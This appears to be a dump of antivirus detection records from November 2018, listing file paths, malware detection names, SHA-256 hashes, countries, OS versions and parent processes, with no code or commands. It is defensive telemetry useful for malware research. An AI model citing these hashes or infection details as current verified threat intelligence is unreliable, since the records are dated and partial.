  Row(detection=Row(filename='drvsetupx64.exe', filepath='f:\\lenovo s10-3 win7\\s10-3 win7\\digital_camera\\bison\\345+6aa\\DrvSetupX64.exe', filesize=512000, name='W64/Infector.Gen8.#M300.#R700956'), hash='f404af549f2ce2e7e84163ee78f10e65a942f4ebbb7183eeeb3f27875eaec5b0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:29:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151040-0232d1ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151040-0232D1ED', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:10:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001744.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{5BEF2280-202E-4A37-AED8-0DB4E065AD64}\\RP0\\A0001744.exe', filesize=128000, name='HEUR/AGEN.1008649.#M1.#R1'), hash='d3ce884fba7a2572fc73047c3d0b7ee2b70c14a5cb523aea791cc29639e05035', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:45:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5954814.exe', filepath='\\\\?\\C:\\Program Files (x86)\\gzpem\\5954814.exe', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:10:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-04-180050/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:49:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='newfolder.exe', filepath='G:\\NewFolder.exe', filesize=0, name='TR/Spy.Gen.#M2.#R1185'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:54:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T15:30:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmmb25fimks.exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmmB25FIMKS.exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150210-8e9a3129', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15712619\\AVSCAN-20181101-145429-53974749\\AVSCAN-20181101-150210-8E9A3129', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:02:13Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='outputforflash.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\samples\\plugins\\htmlwriter\\assets\\outputforflash\\outputforflash.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ex_gss1_0134596.exe', filepath='\\\\?\\C:\\EX_2018\\EX_Gss1_0134596.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='12b96127252952df8a2e4ec3b67021b232c990ec4cf63015c48f39cce2066f6f', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T16:54:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T23:44:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160146-f8cb1f32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160146-F8CB1F32', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ckeditor.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\ckeditor.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0003164.exe', filepath='\\\\?\\E:\\System Volume Information\\_restore{A62AD956-9D25-452C-B4C0-FA01DCD76CDA}\\RP14\\A0003164.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='5f14727cea8a2ec5a509ed52de7b28c4787f3df9fead36d2377e1538c2d91253', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='023faac054424b9d83b16bd9b9942fa4c2c02df860fb39fd770473a46b900ec8', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:10:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d230', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d230', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:49:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-00-43-38.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T16:53:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T18:15:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename="setup_21 (deleted b'32c3021c45729d2989d4d4bedd537cca').htm", filepath="C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\.dropbox.cache\\2018-11-01\\setup_21 (deleted b'32c3021c45729d2989d4d4bedd537cca').htm", filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='64141040eca15e2ac3a9d1f003e1bbc6c905b43651eecb32905328be669e9937', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe19_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T07:54:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194143-05a5f872', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-190638-8E042B77\\AVSCAN-20181102-194143-05A5F872', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:41:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='635774fceb7859d5814a2d8d7cdfd05aa9e22878bd399d98d60748e5f4f6a2d0.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\635774FCEB7859D5814A2D8D7CDFD05AA9E22878BD399D98D60748E5F4F6A2D0.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='635774fceb7859d5814a2d8d7cdfd05aa9e22878bd399d98d60748e5f4f6a2d0', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:43:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153023-8217b55b', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-153012-3D57CEE5\\AVSCAN-20181102-153023-8217B55B', filesize=192000, name='BDS/Androm.EB.73.#M1.#R1'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:30:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minesweeper.exe', filepath='C:\\Program Files\\Microsoft Games\\Minesweeper\\MineSweeper.exe', filesize=896000, name='TR/Patched.Gen.#M300.#R5151'), hash='139e27c07d6903cc24911217be4dddee25e3be5dfe8142b082e6b8ee43da0cbb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T23:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mtykcb_lsi_kyanqs_erger_am.exe', filepath='E:\\D offis\\Downloads\\mtykcb_lsi_kyanqs_erger_am.exe', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='6c0fbbfc4686f11b02513edf0e6f9c5b61f89c7d106a94766448a6e203b36417', metadata=Row(cmdline=None, country='AM', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T16:08:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline='\\\\\\/Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\dllhost.exe', parentsize=7168, timestamp='2018-11-02T07:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-231337-20e90596', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a324cd\\AVSCAN-20181102-231211-13EC6DC1\\AVSCAN-20181102-231337-20E90596', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:13:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3dcc0f2f4a6c71d24c105c22ea053e1482f419f5aa927888f358eb1c72c564c4', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:10:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:11:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='454eed6fc18324b5a6e5255b1ec309993557dc0d7c13e0893d716f5cacbc0e95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T09:34:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:51Z'), dt=datetime.date(2018, 11, 2)),
